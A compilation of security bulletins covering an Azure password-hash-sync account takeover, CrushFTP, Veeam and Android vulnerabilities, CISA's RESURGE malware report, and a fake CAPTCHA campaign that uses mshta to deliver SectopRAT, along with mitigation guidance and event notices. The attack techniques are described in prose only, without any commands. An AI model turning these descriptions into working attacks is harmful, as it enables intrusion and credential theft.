The NJCCIC was recently notified of a cyber incident in which a threat actor compromised a user’s account credentials by targeting the Password Hash Synchronization (PHS) login method. Azure utilizes PHS to validate credentials and authenticate users without needing an additional Identity Provider (IdP). When PHS is enabled, Azure AD Connect uses the AD replication protocol to retrieve the password NT hash for every synced user. The hash is then rehashed and synced to Azure AD. Even if another authentication mechanism is used, PHS is enabled by default and will be used as a backup method during server outages. In a PHS attack, the threat actor exploits PHS and Azure AD Connect server functionality, often by intercepting connector credentials via man-in-the-middle attacks or injecting malicious code directly into the PHS process, allowing them to extract the domain users’ NT hashes.
In the recent incident, after compromising the account, the threat actor created a new computer name and established an alternate phone number as the account’s method for multi-factor authentication (MFA). Within a few hours of gaining access to the compromised account, the threat actors sent nearly 800 phishing emails to both internal and external accounts. These emails likely aimed to compromise additional user accounts for subsequent cyber threat activity; threat actors often compromise user accounts prior to launching ransomware attacks.
Recommendations
Ensure user accounts require MFA, favoring authentication apps and hardware tokens over SMS-based codes.As advised by Microsoft, treat Azure AD Connect as a Tier 0 server.Implement network segmentation to reduce the impact of a network compromise.Monitor for man-in-the-middle attacks and atypical network and account behavior.Follow the principle of least privilege to reduce the number of accounts with unnecessary access.Revoke session tokens when an account is compromised and reduce the duration of valid session tokens. Review additional technical analysis in the Sygnia blog post.
A vulnerability has been discovered in CrushFTP, which could allow for unauthorized access. CrushFTP is a proprietary multi-protocol, multi-platform file transfer server. The vulnerability is mitigated if the DMZ feature of CrushFTP is in place. Successful exploitation of this vulnerability could allow an attacker to remotely control the compromised server and execute remote code. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.
THREAT INTELLEGENCE: There are currently no reports of the vulnerability being exploited in the wild.
SYSTEMS AFFECTED:
CrushFTP v10 and v11 versions.
RISK: Government:
Large and medium government entities: High
Small government entities: Medium
Businesses:
Large and medium business entities: High
Small business entities: Medium
Home users: Low
TECHNICAL SUMMARY: A vulnerability has been discovered in CrushFTP, which could allow for unauthorized access. Details of the vulnerability are as follows:
An exposed HTTP(S) port on CrushFTP’s web interface could lead to unauthenticated access. The vulnerability is mitigated If you have the DMZ feature of CrushFTP in place.
Successful exploitation of this vulnerability could allow an attacker to remotely control the compromised server and execute remote code. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.
RECOMMENDATIONS: We recommend the following actions be taken:
Apply appropriate updates provided by CrushFTP or other vendors which use this software to vulnerable systems immediately after appropriate testing. (M1051: Update Software)
Safeguard 7.1 : Establish and Maintain a Vulnerability Management Process: Establish and maintain a documented vulnerability management process for enterprise assets. Review and update documentation annually, or when significant enterprise changes occur that could impact this Safeguard.
Safeguard 7.2: Establish and Maintain a Remediation Process: Establish and maintain a risk-based remediation strategy documented in a remediation process, with monthly, or more frequent, reviews.
Safeguard 7.4: Perform Automated Application Patch Management: Perform application updates on enterprise assets through automated patch management on a monthly, or more frequent, basis.
Safeguard 7.5 : Perform Automated Vulnerability Scans of Internal Enterprise Assets: Perform automated vulnerability scans of internal enterprise assets on a quarterly, or more frequent, basis. Conduct both authenticated and unauthenticated scans, using a SCAP-compliant vulnerability scanning tool.
Safeguard 7.7: Remediate Detected Vulnerabilities: Remediate detected vulnerabilities in software through processes and tooling on a monthly, or more frequent, basis, based on the remediation process.
Safeguard 12.1: Ensure Network Infrastructure is Up-to-Date: Ensure network infrastructure is kept up-to-date. Example implementations include running the latest stable release of software and/or using currently supported network-as-a-service (NaaS) offerings. Review software versions monthly, or more frequently, to verify software support.
Safeguard 18.1: Establish and Maintain a Penetration Testing Program: Establish and maintain a penetration testing program appropriate to the size, complexity, and maturity of the enterprise. Penetration testing program characteristics include scope, such as network, web application, Application Programming Interface (API), hosted services, and physical premise controls; frequency; limitations, such as acceptable hours, and excluded attack types; point of contact information; remediation, such as how findings will be routed internally; and retrospective requirements.
Safeguard 18.2: Perform Periodic External Penetration Tests: Perform periodic external penetration tests based on program requirements, no less than annually. External penetration testing must include enterprise and environmental reconnaissance to detect exploitable information. Penetration testing requires specialized skills and experience and must be conducted through a qualified party. The testing may be clear box or opaque box.
Safeguard 18.3: Remediate Penetration Test Findings: Remediate penetration test findings based on the enterprise’s policy for remediation scope and prioritization.
Apply the Principle of Least Privilege to all systems and services. Run all software as a non-privileged user (one without administrative privileges) to diminish the effects of a successful attack. (M1026: Privileged Account Management)
Safeguard 4.7: Manage Default Accounts on Enterprise Assets and Software: Manage default accounts on enterprise assets and software, such as root, administrator, and other pre-configured vendor accounts. Example implementations can include: disabling default accounts or making them unusable.
Safeguard 5.5: Establish and Maintain an Inventory of Service Accounts: Establish and maintain an inventory of service accounts. The inventory, at a minimum, must contain department owner, review date, and purpose. Perform service account reviews to validate that all active accounts are authorized, on a recurring schedule at a minimum quarterly, or more frequently.
Vulnerability scanning is used to find potentially exploitable software vulnerabilities to remediate them. (M1016: Vulnerability Scanning)
Safeguard 16.13: Conduct Application Penetration Testing: Conduct application penetration testing. For critical applications, authenticated penetration testing is better suited to finding business logic vulnerabilities than code scanning and automated security testing. Penetration testing relies on the skill of the tester to manually manipulate an application as an authenticated and unauthenticated user.
Architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network. Configure separate virtual private cloud (VPC) instances to isolate critical cloud systems. (M1030: Network Segmentation)
Safeguard 12.2: Establish and Maintain a Secure Network Architecture: Establish and maintain a secure network architecture. A secure network architecture must address segmentation, least privilege, and availability, at a minimum.
Use capabilities to detect and block conditions that may lead to or be indicative of a software exploit occurring. (M1050: Exploit Protection)
Safeguard 10.5:Enable Anti-Exploitation Features: Enable anti-exploitation features on enterprise assets and software, where possible, such as Microsoft® Data Execution Prevention (DEP), Windows® Defender Exploit Guard (WDEG), or Apple® System Integrity Protection (SIP) and Gatekeeper™.
The Cybersecurity and Infrastructure Security Agency (CISA) has published a Malware Analysis Report (MAR) with analysis and associated detection signatures on a new malware variant CISA has identified as RESURGE. RESURGE contains capabilities of the SPAWNCHIMERA malware variant, including surviving reboots; however, RESURGE contains distinctive commands that alter its behavior. These commands:
Create a web shell, manipulate integrity checks, and modify files. Enable the use of web shells for credential harvesting, account creation, password resets, and escalating permissions. Copy the web shell to the Ivanti running boot disk and manipulate the running coreboot image.
RESURGE is associated with the exploitation of CVE-2025-0282 in Ivanti Connect Secure appliances. CVE-2025-0282 is a stack-based buffer overflow vulnerability in Ivanti Connect Secure, Policy Secure, and ZTA Gateways. CISA added CVE-2025-0282 to its Known Exploited Vulnerabilities Catalog on January 8.
For more information on the abovementioned malware variants and YARA rules for detection, see: MAR-25993211.R1.V1.CLEAR.
For the highest level of confidence, conduct a factory reset. For Cloud and Virtual systems, conduct a factory reset using an external known clean image of the device. See Ivanti’s Recommended Recovery Steps for more information, including how to conduct a factory reset. Reset credentials of privileged and non-privileged accounts. Reset passwords for all domain users and all local accounts, such as Guest, HelpAssistant, DefaultAccount, System, Administrator, and krbtgt. The krbtgt account is responsible for handling Kerberos ticket requests as well as encrypting and signing them. The krbtgt account should be reset twice because the account has a two-password history. The first account reset for the krbtgt needs to be allowed to replicate prior to the second reset to avoid any issues. See CISA’s Eviction Guidance for Networks Affected by the SolarWinds and Active Directory/M365 Compromise for more information. Although tailored to Federal Civilian Executive Branch (FCEB) agencies compromised in the 2020 SolarWinds Orion supply chain compromise, the steps are applicable to organizations with Windows AD compromise. Review access policies to temporarily revoke privileges/access for affected devices. If it is necessary to not alert the attacker (e.g., for intelligence purposes), then privileges can be reduced for affected accounts/devices to “contain” them. Reset the relevant account credentials or access keys if the investigation finds the threat actor’s access is limited to non-elevated permissions. Monitor related accounts, especially administrative accounts, for any further signs of unauthorized access.
Join us at a free Microsoft 365 Copilot Training for IT to explore the fundamentals of using Copilot as your own AI assistant. Through expert-led demos, discover how Copilot helps boost collaboration, provides real-time insights, and streamlines workflows. During this tutorial, you’ll discover how to create prompts that deliver results, build foundational AI skills, and get the most out of Copilot in the apps you use every day. Engage with Microsoft experts to ask questions and get answers on how to apply AI to your daily tasks. You’ll gain skills to use Copilot to: Synthesize your emails, meetings, and chats in Microsoft Teams related to specific IT topics, projects, or activities. Perform data analysis and create summaries of product spec sheets to aid in decision making. Develop project plan ideas for a new technology solution in a Microsoft Word document. Draft an email about the proposed implementation plan in Microsoft Outlook. Create a presentation using Microsoft PowerPoint to pitch the project plan. Join us at an upcoming event: Delivery Language: English Closed Captioning Language: English Event Delivery: Digital
The NJCCIC’s email security solution identified a fake CAPTCHA malware campaign sent to New Jersey State employees in an attempt to deliver the SectopRAT infostealer. The emails contain links directing targets to malicious or compromised websites and prompting deceptive CAPTCHA verification challenges. In the background, the visited website copies a command to the target’s clipboard. The CAPTCHA prompts the target to verify their identity by opening a Windows Run dialog box and running the paste command.
The first part of the command triggers a legitimate Windows executable, mshta[.]exe, to fetch a malicious file from the specified domain and run it. The file type can be html, mp3, mp4, jpg, jpeg, swf, and others. This first part of the command is purposefully obfuscated so that the target only sees the last part of the pasted content stating “I am not a robot – reCAPTCHA Verification ID: ####” in the Windows Run dialog box, which prompts the user to click OK to verify their identity. If completed, the encoded PowerShell command runs in the background, and the target inadvertently downloads and executes SectopRAT.
Further analysis indicated that the identified compromised websites used technologies such as the WordPress Content Management System (CMS) platform and JavaScript Libraries. A possible point of entry was an outdated PHP form that allowed threat actors to access the system and inject the malicious code. Additionally, the redirect links pointed to URLs of newly registered domains.
In a similar campaign, threat actors compromised a shared video service unique to auto dealerships in a supply chain attack. When active, auto dealership website visitors risk being infected with SectopRAT. Researchers also discovered similar fake CAPTCHA malware campaigns deploying Lumma and Vidar infostealers and stealthy rootkits. Legitimate CAPTCHA verification challenges validate a user’s identity and do not require users to copy and paste commands or output into a Windows Run dialog box.
Recommendations
If you encounter a suspicious CAPTCHA verification challenge, refrain from visiting the website or taking further action.
Keep browsers and anti-virus/anti-malware software up to date.
Keep systems up to date and apply patches after appropriate testing.
Disable JavaScript in the browser before visiting unknown websites.
Website administrators are advised to remove the malicious code and ensure the website is patched and updated.
Verify all administrators and update the administrative credentials for the CMS platform.
Report malicious cyber activity to the FBI’s IC3 and the NJCCIC.
Location: NCCoE at 9700 Great Seneca Highway, Rockville, MD 20850
The NIST National Cybersecurity Center of Excellence (NCCoE) invites you to join us for our in-person Open House Event to discuss trusted IoT Onboarding!
Untrusted provisioning of IoT device credentials to networks can expose organizations to significant cybersecurity risks. To mitigate these risks, implementing trusted, scalable, and automated mechanisms—starting with secure IoT device network-layer onboarding—is critical for properly safeguarding the IoT ecosystem.
The NIST NCCoE, in collaboration with 11 industry collaborators, has developed several technical build implementations using commercially available technologies such as Wi-Fi Easy Connect, Bootstrap Router Key Infrastructure (BRSKI), and Thread. These technologies accelerate the adoption of trusted network-layer onboarding and relevant best practices. This work is documented in NIST Special Publication (SP) 1800-36, which offers organizations guidance for step-by-step implementation.
During this event, join the NCCoE team and project collaborators to explore the technical implementation solutions outlined in SP 1800-36 and connect with leading experts in the field. This is a valuable opportunity for those interested in advancing IoT security, and our team looks forward to your participation and insights.
The deadline to register is April 10, 2025. Registration is for in-person attendance only. There is no cost to attend.
A vulnerability has been discovered in Veeam Backup & Replication, which could allow for arbitrary code execution. Veeam Backup & Replication is a comprehensive data protection and disaster recovery solution. With Veeam Backup & Replication, you can create image-level backups of virtual, physical and cloud machines and restore from them. Exploitation of this vulnerability requires authentication to the domain but could result in arbitrary code execution. Data such as backups and images could be compromised.
THREAT INTELLEGENCE: There are currently no reports of these vulnerabilities being exploited in the wild.
SYSTEMS AFFECTED:
Veeam Backup & Replication 12.3.0.310 and all earlier version 12 builds.
RISK: Government:
Large and medium government entities: High
Small government entities: Medium
Businesses:
Large and medium business entities: High
Small business entities: Medium
Home users: Low
TECHNICAL SUMMARY: A vulnerability has been discovered in Veeam Backup & Replication, which could allow for arbitrary code execution. Details of the vulnerability are as follows:
A vulnerability in Veeam Backup & Replication which could allow remote code execution (RCE) by authenticated domain users. The vulnerability affects Backup & Replication systems that are domain joined. Veeam explicitly mentions that having domain-joined backup servers is against their security and compliance best practices. However, it is acknowledged that this configuration might still be relatively common in practice. (CVE-2025-23120)
Successful exploitation of this vulnerability requires authentication to the domain but could result in arbitrary code execution. Data such as backups and images could be compromised.
RECOMMENDATIONS: We recommend the following actions be taken:
Apply appropriate updates provided by Veeam or other vendors which use this software to vulnerable systems immediately after appropriate testing. (M1051: Update Software)
Safeguard 7.1: Establish and Maintain a Vulnerability Management Process: Establish and maintain a documented vulnerability management process for enterprise assets. Review and update documentation annually, or when significant enterprise changes occur that could impact this Safeguard.
Safeguard 7.2: Establish and Maintain a Remediation Process: Establish and maintain a risk-based remediation strategy documented in a remediation process, with monthly, or more frequent, reviews.
Safeguard 7.4: Perform Automated Application Patch Management: Perform application updates on enterprise assets through automated patch management on a monthly, or more frequent, basis.
Safeguard 7.5: Perform Automated Vulnerability Scans of Internal Enterprise Assets: Perform automated vulnerability scans of internal enterprise assets on a quarterly, or more frequent, basis. Conduct both authenticated and unauthenticated scans, using a SCAP-compliant vulnerability scanning tool.
Safeguard 7.7: Remediate Detected Vulnerabilities: Remediate detected vulnerabilities in software through processes and tooling on a monthly, or more frequent, basis, based on the remediation process.
Safeguard 12.1: Ensure Network Infrastructure is Up-to-Date: Ensure network infrastructure is kept up-to-date. Example implementations include running the latest stable release of software and/or using currently supported network-as-a-service (NaaS) offerings. Review software versions monthly, or more frequently, to verify software support.
Safeguard 18.1: Establish and Maintain a Penetration Testing Program: Establish and maintain a penetration testing program appropriate to the size, complexity, and maturity of the enterprise. Penetration testing program characteristics include scope, such as network, web application, Application Programming Interface (API), hosted services, and physical premise controls; frequency; limitations, such as acceptable hours, and excluded attack types; point of contact information; remediation, such as how findings will be routed internally; and retrospective requirements.
Safeguard 18.2: Perform Periodic External Penetration Tests: Perform periodic external penetration tests based on program requirements, no less than annually. External penetration testing must include enterprise and environmental reconnaissance to detect exploitable information. Penetration testing requires specialized skills and experience and must be conducted through a qualified party. The testing may be clear box or opaque box.
Safeguard 18.3: Remediate Penetration Test Findings: Remediate penetration test findings based on the enterprise’s policy for remediation scope and prioritization.
Configure Active Directory to prevent use of certain techniques; use SID Filtering, etc. (Mitigation M1015 : Active Directory Configuration)
Safeguard 4.1: Establish and Maintain a Secure Configuration Process: Establish and maintain a secure configuration process for enterprise assets (end-user devices, including portable and mobile, non-computing/IoT devices, and servers) and software (operating systems and applications). Review and update documentation annually, or when significant enterprise changes occur that could impact this Safeguard.
Safeguard 18.5: Perform Periodic Internal Penetration Tests: Perform periodic internal penetration tests based on program requirements, no less than annually. The testing may be clear box or opaque box.
Safeguard 18.3: Remediate Penetration Test Findings: Remediate penetration test findings based on the enterprise’s policy for remediation scope and prioritization.
Manage the creation, modification, use, and permissions associated to user accounts. (Mitigation M1018 : User Account Management)
Safeguard 6.1: Establish an Access Granting Process: Establish and follow a process, preferably automated, for granting access to enterprise assets upon new hire, rights grant, or role change of a user.
Safeguard 6.2: Establish an Access Revoking Process: Establish and follow a process, preferably automated, for revoking access to enterprise assets, through disabling accounts immediately upon termination, rights revocation, or role change of a user. Disabling accounts, instead of deleting accounts, may be necessary to preserve audit trails.
Safeguard 6.8: Define and Maintain Role-Based Access Control: Define and maintain role-based access control, through determining and documenting the access rights necessary for each role within the enterprise to successfully carry out its assigned duties. Perform access control reviews of enterprise assets to validate that all privileges are authorized, on a recurring schedule at a minimum annually, or more frequently.
Safeguard 15.7: Securely Decommission Service Providers: Securely decommission service providers. Example considerations include user and service account deactivation, termination of data flows, and secure disposal of enterprise data within service provider systems.
Architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network. Configure separate virtual private cloud (VPC) instances to isolate critical cloud systems. (Mitigation M1030 : Network Segmentation)
Safeguard 3.12: Segment Data Processing and Storage Based on Sensitivity: Segment data processing and storage based on the sensitivity of the data. Do not process sensitive data on enterprise assets intended for lower sensitivity data.
Safeguard 4.4: Implement and Manage a Firewall on Servers: Implement and manage a firewall on servers, where supported. Example implementations include a virtual firewall, operating system firewall, or a third-party firewall agent.
Safeguard 12.2: Establish and Maintain a Secure Network Architecture: Establish and maintain a secure network architecture. A secure network architecture must address segmentation, least privilege, and availability, at a minimum.
Safeguard 12.8: Establish and Maintain Dedicated Computing Resources for All Administrative Work: Establish and maintain dedicated computing resources, either physically or logically separated, for all administrative tasks or tasks requiring administrative access. The computing resources should be segmented from the enterprise’s primary network and not be allowed internet access.
Safeguard 16.8: Separate Production and Non-Production Systems: Maintain separate environments for production and non-production systems.
Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator. (Mitigation M1032 : Multi-factor Authentication)
Safeguard 6.4: Require MFA for Remote Network Access: Require MFA for remote network access.
Safeguard 6.5: Require MFA for Administrative Access: Require MFA for all administrative access accounts, where supported, on all enterprise assets, whether managed on-site or through a third-party provider.
Join us at Microsoft 365 Copilot Training for IT to learn how to use Microsoft Copilot to simplify your everyday tasks. During this free event, discover how Copilot can help you enhance efficiency, simplify complex tasks, and optimize technical workflows. You’ll be able to: Use Copilot to summarize the information in a product spec document for a network security product and create a project plan to implement the product. Use Copilot in PowerPoint to create and customize a business presentation based on the product plan that you created for the new network security product. Use Copilot in Word to modify a technical implementation report for a customer who is planning to install your new network security product. Use Copilot in Outlook to draft an email that provides highlights from the technical implementation report that you created for the customer who is installing your new network security product. Join us at an upcoming event:
Delivery Language: English Closed Captioning Language: English Event Delivery: Digital
Draft Released Today for Public Comment— NIST Cybersecurity Framework 2.0: Cybersecurity, Enterprise Risk Management, and Workforce Management Quick Start Guide
The Initial Public Draft (IPD) of NIST Special Publication 1308, NIST Cybersecurity Framework 2.0: Cybersecurity, Enterprise Risk Management, and Workforce Management Quick Start Guide is now published! This document shows how the Workforce Framework for Cybersecurity (NICE Framework) and the Cybersecurity Framework (CSF) 2.0 can be used together to address cybersecurity risk.
This publication is the most recent within a portfolio of CSF 2.0 quick start guides released since February 26, 2024. These resources provide different audiences with tailored pathways into the CSF 2.0 and make the Framework easier to put into action. View all CSF 2.0 quick start guides here.
The comment period for NIST Special Publication 1308, NIST Cybersecurity Framework 2.0: Cybersecurity, Enterprise Risk Management, and Workforce Management Quick Start Guide is open through April 25, 2025, at 11:59 PM.
Multiple vulnerabilities have been discovered in Google Android OS, the most severe of which could allow for remote code execution with no additional execution privileges needed. Android is an operating system developed by Google for mobile devices, including, but not limited to, smartphones, tablets, and watches. Successful exploitation of the most severe of these vulnerabilities could allow for remote code execution in the context of the affected service account. Depending on the privileges associated with the service account, threat actors could install programs; view, change, or delete data; or create new accounts with full user rights. Service accounts that are configured to have fewer user rights on the system could be less impacted than those who operate with administrative user rights.
Risk Government: – Large and medium government entities: High – Small government entities: High
Businesses: – Large and medium business entities: High – Small business entities: High
Home Users: Low
Recommendations
Apply appropriate mitigations provided by Google to vulnerable systems immediately after appropriate testing. Use capabilities to detect and block conditions that may lead to or be indicative of a software exploit occurring. Restrict execution of code to a virtual environment on or in transit to an endpoint system.
